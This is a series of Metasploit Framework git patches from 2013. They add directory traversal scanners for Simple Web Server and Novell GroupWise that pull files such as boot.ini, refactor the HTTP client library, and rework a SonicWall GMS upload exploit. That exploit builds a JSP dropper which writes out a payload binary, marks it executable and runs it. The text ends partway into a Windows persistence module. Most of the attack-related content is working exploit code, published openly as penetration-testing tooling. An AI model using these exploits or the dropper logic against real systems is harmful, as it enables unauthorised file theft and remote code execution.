'The name of the file to download', 'boot.ini']) + ], self.class) + + deregister_options('RHOST') + end + + + # + # The web server will actually return two HTTP statuses: A 400 (Bad Request), and the actual + # HTTP status -- the second one is what we want. We cannot use the original update_cmd_parts() + # in Response, because that will only grab the first HTTP status. + # + def parse_status_line(res) + str = res.to_s + + status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/) + + if status_line.empty? + fail_with(Exploit::Failure::Unknown, "Invalid response command string.") + elsif status_line.length == 1 + proto, code, message = status_line[0] + else + proto, code, message = status_line[1] + end + + return message, code.to_i, proto + end + + + # + # The MSF API cannot parse this weird response + # + def parse_body(res) + str = res.to_s + str.split(/\r\n\r\n/)[2] || '' + end + + + def run_host(ip) + uri = normalize_uri("../"*8, datastore['FILEPATH']) + res = send_request_raw({'uri'=>uri}) + + if not res + print_error("#{ip}:#{rport} - Request timed out.") + return + end + + # The weird HTTP response totally messes up Rex::Proto::Http::Response, HA! + message, code, proto = parse_status_line(res) + body = parse_body(res) + + if code == 200 + + if body.empty? + print_status("#{ip}:#{rport} - File is empty.") + return + end + + vprint_line(body) + fname = ::File.basename(datastore['FILEPATH']) + p = store_loot('simplewebserver.file', 'application/octet-stream', ip, body, fname) + print_good("#{ip}:#{rport} - #{fname} stored in: #{p}") + else + print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})") + end + end +end \ No newline at end of file From a15889305aa763a37452e55647be2971602d8d0d Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 18:56:06 -0600 Subject: [PATCH 300/421] Return a Request object Still changes the return type, but now at least .to_s will give you the right thing and at least a Request object is a logical thing to return. --- lib/rex/proto/http/client.rb | 134 +++++++++++++++++++--------------- lib/rex/proto/http/request.rb | 2 + 2 files changed, 78 insertions(+), 58 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d6d3fc68f2dd..760268a7f78e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -151,27 +151,44 @@ def set_config(opts = {}) # # Create an arbitrary HTTP request # + # @param opts [Hash] + # @option opts 'agent' [String] User-Agent header value + # @option opts 'basic_auth' [String] Basic-Auth header value + # @option opts 'connection' [String] Connection header value + # @option opts 'cookie' [String] Cookie header value + # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) + # @option opts 'encode' [Bool] URI encode the supplied URI, default: false + # @option opts 'headers' [Hash] HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code> + # @option opts 'method' [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET + # @option opts 'proto' [String] protocol, default: HTTP + # @option opts 'query' [String] raw query string + # @option opts 'raw_headers' [Hash] HTTP headers + # @option opts 'uri' [String] the URI to request + # @option opts 'version' [String] version of the protocol, default: 1.1 + # @option opts 'vhost' [String] Host header value + # + # @return [Request] def request_raw(opts={}) - c_enc = opts['encode'] || false - c_uri = opts['uri'] || '/' + c_ag = opts['agent'] || config['agent'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' c_body = opts['data'] || '' + c_conn = opts['connection'] + c_cook = opts['cookie'] || config['cookie'] + c_enc = opts['encode'] || false + c_head = opts['headers'] || config['headers'] || {} + c_host = opts['vhost'] || config['vhost'] || self.hostname c_meth = opts['method'] || 'GET' c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_conn = opts['connection'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' + c_uri = opts['uri'] || '/' + c_vers = opts['version'] || config['version'] || '1.1' # An agent parameter was specified, but so was a header, prefer the header if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') c_ag = nil end - + uri = set_uri(c_uri) req = '' @@ -191,7 +208,6 @@ def request_raw(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) - if (c_auth.length > 0) req << set_basic_auth_header(c_auth) end @@ -201,53 +217,45 @@ def request_raw(opts={}) req << set_extra_headers(c_head) req << set_raw_headers(c_rawh) req << set_body(c_body) - - {:string => req , :opts => opts} + + request = Request.new + request.parse(req) + request.options = opts + + request end # # Create a CGI compatible request # - # Options: - # - agent: User-Agent header value - # - basic_auth: Basic-Auth header value - # - connection: Connection header value - # - cookie: Cookie header value - # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ - # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI, default: false - # - encode_params: URI encode the GET or POST variables (names and values), default: true - # - headers: HTTP headers as a hash, e.g. <code>{ "X-MyHeader" => "value" }</code> - # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET - # - proto: protocol, default: HTTP - # - query: raw query string - # - raw_headers: HTTP headers as a hash - # - uri: the URI to request - # - vars_get: GET variables as a hash to be translated into a query string - # - vars_post: POST variables as a hash to be translated into POST data - # - version: version of the protocol, default: 1.1 - # - vhost: Host header value + # @param (see #request_raw) + # @option opts (see #request_raw) + # @option opts 'ctype' [String] Content-Type header value, default: +application/x-www-form-urlencoded+ + # @option opts 'encode_params' [Bool] URI encode the GET or POST variables (names and values), default: true + # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string + # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # + # @return [Request] def request_cgi(opts={}) + c_ag = opts['agent'] || config['agent'] + c_body = opts['data'] || '' + c_cgi = opts['uri'] || '/' + c_conn = opts['connection'] + c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' + c_head = opts['headers'] || config['headers'] || {} + c_host = opts['vhost'] || config['vhost'] c_meth = opts['method'] || 'GET' + c_path = opts['path_info'] c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers'] || config['raw_headers'] || '' c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_vers = opts['version'] || config['version'] || '1.1' uri = set_cgi(c_cgi) qstr = c_qs @@ -264,7 +272,7 @@ def request_cgi(opts={}) c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' qstr << (c_enc_p ? set_encode_uri(val) : val) end @@ -315,12 +323,19 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - {:string => req , :opts => opts} + request = Request.new + request.parse(req) + request.options = opts + + request end # # Connects to the remote server if possible. # + # @param t [Fixnum] Timeout + # @see Rex::Socket::Tcp.create + # @return [Rex::Socket::Tcp] def connect(t = -1) # If we already have a connection and we aren't pipelining, close it. if (self.conn) @@ -360,28 +375,29 @@ def close # # Sends a request and gets a response back - # If the request is a 401, and we have creds, it will attempt to - # complete authentication and return the final response + # + # If the request is a 401, and we have creds, it will attempt to complete + # authentication and return the final response # def send_recv(req, t = -1, persist=false) - opts = req[:opts] - req = req[:string] res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, opts, t, persist) + res = send_auth(res, req.options, t, persist) end res end # # Transmit an HTTP request and receive the response - # If persist is set, then the request will attempt - # to reuse an existing connection. # + # If persist is set, then the request will attempt to reuse an existing + # connection. + # + # Call this directly instead of {#send_recv} if you don't want automatic + # authentication handling. + # + # @return [Response] def _send_recv(req, t = -1, persist=false) - if req.kind_of? Hash and req[:string] - req = req[:string] - end @pipeline = persist send_request(req, t) res = read_response(t) @@ -392,12 +408,14 @@ def _send_recv(req, t = -1, persist=false) # # Send an HTTP request to the server # + # @param req [Request,#to_s] The request to send + # @param t (see #connect) def send_request(req, t = -1) connect(t) conn.put(req.to_s) end - # Validates that the client has creds + # Validates that the client has creds def have_creds? !(self.username.nil?) && self.username != '' end @@ -420,7 +438,7 @@ def send_auth(res, opts, t, persist) else opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} end - + req = request_cgi(opts) res = _send_recv(req,t,persist) return res @@ -628,7 +646,7 @@ def negotiate_auth(opts={}) opts['password'] ||= self.password.to_s if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " + provider = "Negotiate " else provider = 'NTLM ' end diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb index 45d13b2baed4..af88fdcb68da 100644 --- a/lib/rex/proto/http/request.rb +++ b/lib/rex/proto/http/request.rb @@ -48,6 +48,8 @@ def initialize(uri = '/', proto = DefaultProtocol) end end + attr_accessor :options + # # Initializes an instance of an HTTP request with the supplied method, URI, # and protocol. From b6c6397da3aa5e4befb8b3c277fb994359da1719 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 19:21:20 -0600 Subject: [PATCH 301/421] typo --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 175e676f4aaf..66311f1310bd 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -186,7 +186,7 @@ def exploit }).to_s File.open("foo.war", "wb") { |fd| fd.write(war) } - dropper = jsp_bin_dopper(war, "#{install_path}webapps/foo.war") + dropper = jsp_bin_dropper(war, "#{install_path}webapps/foo.war") upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) send_request_cgi( { @@ -201,7 +201,7 @@ def exploit }) end - def jsp_bin_dopper(bin_data, output_file) + def jsp_bin_dropper(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| From 77390a5935397b7e378f471562587f9f15855405 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 6 Feb 2013 23:34:55 -0600 Subject: [PATCH 302/421] Fix a bug reported by Tom Liston --- modules/auxiliary/server/capture/smb.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index af2cfc586288..74c5d11bf488 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -614,7 +614,7 @@ def smb_get_hash(smb, arg = {}, esn=true) smb[:domain] ? smb[:domain] : "NULL", @challenge.unpack("H*")[0], nt_hash.empty? ? "0" * 32 : nt_hash, - nt_cli_challenge ? "0" * 160 : nt_cli_challenge + nt_cli_challenge.empty? ? "0" * 160 : nt_cli_challenge ].join(":").gsub(/\n/, "\\n") ) fd.close From a3264e18e2f3257a2428e10dd1b42bad35c5eb7b Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:30:17 -0600 Subject: [PATCH 303/421] There aint no fail_with(), must use print_error --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index a4cf884e184d..bd46af181427 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -55,7 +55,8 @@ def parse_status_line(res) status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/) if status_line.empty? - fail_with(Exploit::Failure::Unknown, "Invalid response command string.") + print_error("Invalid response command string.") + return elsif status_line.length == 1 proto, code, message = status_line[0] else From b11f05274680457309baf4ba428eb143d5cf1fdc Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:32:29 -0600 Subject: [PATCH 304/421] Allow arbitrary depth --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index bd46af181427..b045ffb9c330 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -37,7 +37,8 @@ def initialize(info = {}) register_options( [ - OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']) + OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 8]) ], self.class) deregister_options('RHOST') @@ -77,7 +78,7 @@ def parse_body(res) def run_host(ip) - uri = normalize_uri("../"*8, datastore['FILEPATH']) + uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH']) res = send_request_raw({'uri'=>uri}) if not res From 98559d4d51673f223e5a483c81c18656deac6762 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:45:53 -0600 Subject: [PATCH 305/421] Do a check and make sure this is Simple Web Server --- .../http/simple_webserver_traversal.rb | 37 ++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index b045ffb9c330..6988c85e769a 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -77,7 +77,22 @@ def parse_body(res) end + def is_sws? + res = send_request_raw({'uri'=>'/'}) + if res and res.headers['Server'].to_s =~ /PMSoftware\-SWS/ + return true + else + return false + end + end + + def run_host(ip) + if not is_sws? + print_error("#{ip}:#{rport} - This isn't a Simple Web Server") + return + end + uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH']) res = send_request_raw({'uri'=>uri}) @@ -105,4 +120,24 @@ def run_host(ip) print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})") end end -end \ No newline at end of file +end + +=begin +Vulnerable: +< HTTP/1.1 200 Ok +< Server: PMSoftware-SWS/2.3 +< Date: Thu, 07 Feb 2013 16:34:6 GMT +< Accept-Ranges: bytes +< Content-type: text/html +< Content-Length: 1550 + +Not vulnerable: + +< HTTP/1.1 200 Ok +< Server: PMSoftware-SWS/2.3 +< Date: Thu, 07 Feb 2013 16:39:53 GMT +< Accept-Ranges: bytes +< Content-type: text/html +< Content-Length: 1550 + +=end \ No newline at end of file From d554c3a56a2ffb1420ecde75a1b4e1fc196a4f65 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:46:42 -0600 Subject: [PATCH 306/421] Don't really need the bottom comment --- .../http/simple_webserver_traversal.rb | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 6988c85e769a..d98e6f38fed1 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -122,22 +122,3 @@ def run_host(ip) end end -=begin -Vulnerable: -< HTTP/1.1 200 Ok -< Server: PMSoftware-SWS/2.3 -< Date: Thu, 07 Feb 2013 16:34:6 GMT -< Accept-Ranges: bytes -< Content-type: text/html -< Content-Length: 1550 - -Not vulnerable: - -< HTTP/1.1 200 Ok -< Server: PMSoftware-SWS/2.3 -< Date: Thu, 07 Feb 2013 16:39:53 GMT -< Accept-Ranges: bytes -< Content-type: text/html -< Content-Length: 1550 - -=end \ No newline at end of file From 7f746e1caa22082af46ce5d6cd1867f6aca7c95c Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 11:13:18 -0600 Subject: [PATCH 307/421] That's what he said. --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index d98e6f38fed1..3de0b7399b86 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -108,7 +108,8 @@ def run_host(ip) if code == 200 if body.empty? - print_status("#{ip}:#{rport} - File is empty.") + # HD's likes vprint_* in case it's hitting a large network + vprint_status("#{ip}:#{rport} - File is empty.") return end From 0d3c32b0a43b170cd4819c3cd0aee84684b9fad8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 7 Feb 2013 21:15:49 +0100 Subject: [PATCH 308/421] Added module for CVE-2012-0419 --- .../http/groupwise_agents_http_traversal.rb | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb new file mode 100644 index 000000000000..47b4f1ec8f02 --- /dev/null +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell Groupwise Agents HTTP Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability in Novell Groupwise. + The vulnerability exists in the web interface of both the Post Office and the + MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2 + over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'r () b13$', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0419' ], + [ 'OSVDB', '85801' ], + [ 'BID', '55648' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7010772' ] + ] + )) + + register_options( + [ + Opt::RPORT(7181), # Also 7180 can be used + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 10]) + ], self.class) + end + + def run_host(ip) + # No point to continue if no filename is specified + if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? + vprint_error("#{rhost}:#{rport} - Please supply FILEPATH") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + + travs = normalize_uri("/help/", travs, datastore['FILEPATH']) + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => travs, + 'method' => 'GET', + }) + + if res and res.code == 200 + contents = res.body + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'novell.groupwise', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end From e9912496d88923308f70ced8f0c66973873f6476 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 7 Feb 2013 22:05:39 +0100 Subject: [PATCH 309/421] nice check learned from sinn3r --- .../http/groupwise_agents_http_traversal.rb | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 47b4f1ec8f02..1cd2f5df0752 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -45,10 +45,19 @@ def initialize(info = {}) ], self.class) end + def is_groupwise? + res = send_request_raw({'uri'=>'/'}) + if res and res.headers['Server'].to_s =~ /GroupWise/ + return true + else + return false + end + end + def run_host(ip) - # No point to continue if no filename is specified - if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? - vprint_error("#{rhost}:#{rport} - Please supply FILEPATH") + + if not is_groupwise? + vprint_error("#{rhost}:#{rport} - This isn't a GroupWise Agent HTTP Interface") return end From 13d104598903fb02837aaf508ee0df84704cf677 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 16:56:38 -0600 Subject: [PATCH 310/421] Works for java and native linux targets --- lib/msf/core/payload/java.rb | 17 ++- .../multi/http/sonicwall_gms_upload.rb | 109 ++++++++++++------ 2 files changed, 84 insertions(+), 42 deletions(-) diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 824db13b0865..851ffb4aaade 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -35,15 +35,14 @@ def generate end # - # Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define - # a list of class files in @class_files which are pulled from - # Msf::Config.data_directory. The configuration file is created by the - # payload's #config method. - # - # +opts+ can include: - # +:main_class+:: the name of the Main-Class attribute in the manifest. - # Defaults to "metasploit.Payload" + # Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers + # define a list of class files in @class_files which are pulled from + # {Msf::Config.data_directory}. The configuration file is created by + # the payload's #config method. # + # @option opts :main_class [String] the name of the Main-Class + # attribute in the manifest. Defaults to "metasploit.Payload" + # @return [Rex::Zip::Jar] def generate_jar(opts={}) raise if not respond_to? :config # Allow changing the jar's Main Class in the manifest so wrappers @@ -63,7 +62,7 @@ def generate_jar(opts={}) end # - # Like #generate_jar, this method is used by stagers to create a war file + # Like {#generate_jar}, this method is used by stagers to create a war file # as a Rex::Zip::Jar object. # # @param opts [Hash] diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 66311f1310bd..27f928b9bd4d 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -79,10 +79,12 @@ def initialize(info = {}) end - def get_install_path + def install_path + return @install_path if @install_path + res = send_request_cgi( { - 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'uri' => normalize_uri(target_uri.path,"appliance","applianceMainPage") + "?skipSessionCheck=1", 'method' => 'POST', 'connection' => 'TE, close', 'headers' => @@ -99,11 +101,12 @@ def get_install_path } }) + @install_path = nil if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ - return $1 + @install_path = $1 end - return nil + @install_path end def upload_file(location, filename, contents) @@ -113,12 +116,13 @@ def upload_file(location, filename, contents) post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") + # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { - 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'uri' => normalize_uri(target_uri.path, "appliance","applianceMainPage") + "?skipSessionCheck=1", 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", @@ -128,11 +132,7 @@ def upload_file(location, filename, contents) }, 'connection' => 'TE, close' }) - if target['Platform'] == "win" - register_files_for_cleanup("#{location}\\#{filename}") - else - register_files_for_cleanup("#{location}/#{filename}") - end + register_files_for_cleanup(path_join(location, filename)) if res and res.code == 200 and res.body.empty? return true @@ -143,10 +143,8 @@ def upload_file(location, filename, contents) def check @peer = "#{rhost}:#{rport}" - @uri = normalize_uri(target_uri.path) - @uri << '/' if @uri[-1,1] != '/' - if get_install_path.nil? + if install_path.nil? return Exploit::CheckCode::Safe end @@ -155,12 +153,9 @@ def check def exploit @peer = "#{rhost}:#{rport}" - @uri = normalize_uri(target_uri.path) - @uri << '/' if @uri[-1,1] != '/' # Get Tomcat installation path print_status("#{@peer} - Retrieving Tomcat installation path...") - install_path = get_install_path if install_path.nil? fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") @@ -168,40 +163,74 @@ def exploit print_good("#{@peer} - Tomcat installed on #{install_path}") - if target['Platform'] == "linux" - @location = "#{install_path}webapps/appliance/" - elsif target['Platform'] == "win" - @location = "#{install_path}webapps\\appliance\\" + if target['Platform'] == "java" + exploit_java + else + exploit_native end + end - # Generate the WAR containing the EXE containing the payload + def exploit_java jsp_name = "index" - app_base = rand_text_alphanumeric(4+rand(32-4)) + #app_base = rand_text_alphanumeric(4+rand(32-4)) + app_base = "foo" war = payload.encoded_war({ - :app_name => app_base, - :jsp_name => jsp_name, - :arch => target.arch, - :platform => target.platform - }).to_s + :app_name => app_base, + :jsp_name => jsp_name, + }).to_s File.open("foo.war", "wb") { |fd| fd.write(war) } - dropper = jsp_bin_dropper(war, "#{install_path}webapps/foo.war") - upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) + war_filename = path_join(install_path, "webapps","#{app_base}.war") + dropper = jsp_drop_bin(war, war_filename) + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + + upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) send_request_cgi( { - 'uri' => normalize_uri("#{@uri}appliance/foo-dropper.jsp"), + 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), 'method' => 'GET' }) + send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET' + }) + end + + + def exploit_native + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + exe = payload.encoded_exe + exe_filename = Rex::Text.rand_text_alpha(8) + if target['Platform'] == "win" + exe << ".exe" + end + dropper = jsp_drop_and_execute(exe, "#{install_path}#{exe_filename}") + + upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) send_request_cgi( { - 'uri' => normalize_uri("#{target_uri.path}/foo/#{app_base}/#{jsp_name}.jsp"), + 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), 'method' => 'GET' }) + + end + + def path_join(*paths) + if target['Platform'] == "win" + path = paths.join("\\") + path.gsub!(%r|\\+|, "\\") + else + path = paths.join("/") + path.gsub!(%r|//+|, "/") + end + + path end - def jsp_bin_dropper(bin_data, output_file) + def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| @@ -223,9 +252,23 @@ def jsp_bin_dropper(bin_data, output_file) jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| + jspraw << %Q|%>\n| + + jspraw + end + def jsp_execute_command(command) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| - return jspraw + + jspraw + end + + def jsp_drop_and_execute(bin_data, output_file) + jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end end From 19e989dff9b1c3eae565a1dc421219e8236d6fc8 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 7 Feb 2013 19:11:44 -0400 Subject: [PATCH 311/421] Initial commit fo the migrated module --- modules/exploits/windows/local/persistence.rb | 214 ++++++++++++++++++ 1 file changed, 214 insertions(+) create mode 100644 modules/exploits/windows/local/persistence.rb diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb new file mode 100644 index 000000000000..336c8678b6f9 --- /dev/null +++ b/modules/exploits/windows/local/persistence.rb @@ -0,0 +1,214 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/registry' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Registry + include Exploit::EXE + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Persistent Payload Installer', + 'Description' => %q{ + This Module will create a boot persistent reverse Meterpreter session by + installing on the target host the payload as a script that will be executed + at user logon or system startup depending on privilege and selected startup + method. + + REXE mode will transfer a binary of your choosing to remote host to be + used as a payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez 